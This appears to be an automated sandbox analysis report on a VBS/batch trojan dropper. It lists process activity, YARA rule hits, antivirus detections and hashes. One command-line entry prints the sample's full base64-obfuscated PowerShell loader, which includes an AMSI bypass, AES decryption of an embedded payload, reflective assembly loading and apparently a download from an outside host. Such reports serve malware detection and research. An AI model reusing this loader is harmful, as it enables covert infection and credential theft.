NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05060000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05061000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05063000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05064000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\EWVm.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	cmd.exe /c C:\Users\test22\AppData\Local\Temp\EWVm.bat
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Local\Temp\EWVm.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnYVZOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDE0VTFSU1NVNUhVa0ZPUkU5TklDaFRWRkpKVGtkU1FVNUVUMDBvVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUWGRUVkZKSlRrZFNRVTVFVDAxeVUxUlNTVTVIVWtGT1JFOU5JQzFUVkZKSlRrZFNRVTVFVDAxVlUxUlNTVTVIVWtGT1JFOU5jMU5VVWtsT1IxSkJUa1JQVFdWVFZGSkpUa2RTUVU1RVQwMUNVMVJTU1U1SFVrRk9SRTlOWVZOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TlkxTlVVa2xPUjFKQlRrUlBUVkJUVkZKSlRrZFNRVTVFVDAxaFUxUlNTVTVIVWtGT1JFOU5jbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMXBVMVJTU1U1SFVrRk9SRTlOYmxOVVVrbE9SMUpCVGtSUFRXZFRWRkpKVGtkU1FVNUVUMDBnSWxOVVVrbE9SMUpCVGtSUFRXaFRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TmRGTlVVa2xPUjFKQlRrUlBUWEJUVkZKSlRrZFNRVTVFVDAwNlUxUlNTVTVIVWtGT1JFOU5MMU5VVWtsT1IxSkJUa1JQVFM5VFZGSkpUa2RTUVU1RVQwMDRVMVJTU1U1SFVrRk9SRTlOTjFOVVVrbE9SMUpCVGtSUFRTNVRWRkpKVGtkU1FVNUVUMDB4VTFSU1NVNUhVa0ZPUkU5Tk1sTlVVa2xPUjFKQlRrUlBUVEZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5OMU5VVWtsT1IxSkJUa1JQVFRsVFZGSkpUa2RTUVU1RVQwMHVVMVJTU1U1SFVrRk9SRTlOTVZOVVVrbE9SMUpCVGtSUFRUQlRWRkpKVGtkU1FVNUVUMDB6VTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV1JUVkZKSlRrZFNRVTVFVDAxdlUxUlNTVTVIVWtGT1JFOU5kMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMXNVMVJTU1U1SFVrRk9SRTlOYjFOVVVrbE9SMUpCVGtSUFRXRlRWRkpKVGtkU1FVNUVUMDFrVTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAxaVUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFM1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOZUZOVVVrbE9SMUpCVGtSUFRYUlRWRkpKVGtkU1FVNUVUMDBpVTFSU1NVNUhVa0ZPUkU5TktWTlVVa2xPUjFKQlRrUlBUUzVUVkZKSlRrZFNRVTVFVDAxRFUxUlNTVTVIVWtGT1JFOU5iMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOWlZOVVVrbE9SMUpCVGtSUFRXNVRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TkxsTlVVa2xPUjFKQlRrUlBUVkpUVkZKSlRrZFNRVTVFVDAxbGNHeGhZMlVvSjBGQ1F5Y3NKeWNwS1NBdFJYSnliM0pCWTNScGIyNGdVMmxzWlc1MGJIbERiMjUwYVc1MVpUcz0nKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c1JvdXRpbmUgLURpc2FibGVTdmMgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIm1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gVkZHS0IoJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRWkvNkNIVnl5cjdxczJDaTBSd0JJOERIbHNIUWkwKzVaaitpS1dzNU81MD0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCcyeVAwSHhYWUh6NG8rOVk5YmdneXBRPT0nKTskRE1DT0c9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JFNEVkJWPSRETUNPRy5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JERNQ09HLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JFNEVkJWO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRVVFJUVz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRMWVhGQT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFhXWEFCPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFVUUlRXLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskWFdYQUIuQ29weVRvKCRMWVhGQSk7JFhXWEFCLkRpc3Bvc2UoKTskVVRSVFcuRGlzcG9zZSgpOyRMWVhGQS5EaXNwb3NlKCk7JExZWEZBLlRvQXJyYXkoKTt9JEhXWFJPPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKFZGR0tCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJEhXWFJPLCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\EWVm.bat
cmdline	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\EWVm.bat

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 26, 2025, 1:23 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\EWVm.bat

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

Lionic	Trojan.VBS.SAgent.4!c
ESET-NOD32	VBS/TrojanDropper.Agent.PMD
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.VBS.SAgent.gen
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Rising	Dropper.Agent/VBS!8.12129 (TOPIS:E0:StpoWsDktbS)
Sophos	VBS/Drop-DKY
Ikarus	Trojan-Downloader.VBS.Agent
Google	Detected
ZoneAlarm	VBS/Drop-DKY
GData	Script.Trojan.Agent.W33KJT
Tencent	Vbs.Trojan.Sagent.Mjgl
huorong	HEUR:Trojan/VBS.Agent.w
Fortinet	VBS/Agent.BXZ!tr
AVG	Script:SNH-gen [Trj]

Creates a slightly modified copy of itself (1 event)

description

Possibly a polymorphic version of itself

file

{u'yara': [], u'sha1': u'c898cdf4ae899c187499545101dffe15ed480e65', u'name': u'2c6562cad99275d7_ewvm.bat', u'filepath': u'C:\\Users\\test22\\AppData\\Local\\Temp\\EWVm.bat', u'sha512': u'09d963d8be74b9216a6189bc01d73aa550ba2fb89b0c894e7b03a25b004be9f8d0a0e3e60731ef448fd9eb4b76a1f74fd1a8e08f4c685de3e78fa7b615e2ed8c', u'urls': [], u'crc32': u'C1215EE2', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/58311/files/2c6562cad99275d7_ewvm.bat', u'ssdeep': u'768:u6e8+632JWihztwufWpMFzRcknrr4mTQfLm8YKi8XzPk:uDSqhaufWEz+knHl8Bif', u'sha256': u'2c6562cad99275d78a16f9a833ed57c77fae2e92e2fc70c62b873c8a9c6cb68e', u'type': u'ASCII text, with very long lines, with CRLF line terminators', u'pids': [2552], u'md5': u'f491b501ad8fdc991afa0307294e93a3', u'size': 35199}

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	cmd.exe /c C:\Users\test22\AppData\Local\Temp\EWVm.bat
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\EWVm.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2632 resumed a thread in remote process 2696
NtResumeThread March 26, 2025, 1:23 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2696	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

8191032732_1740264845.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All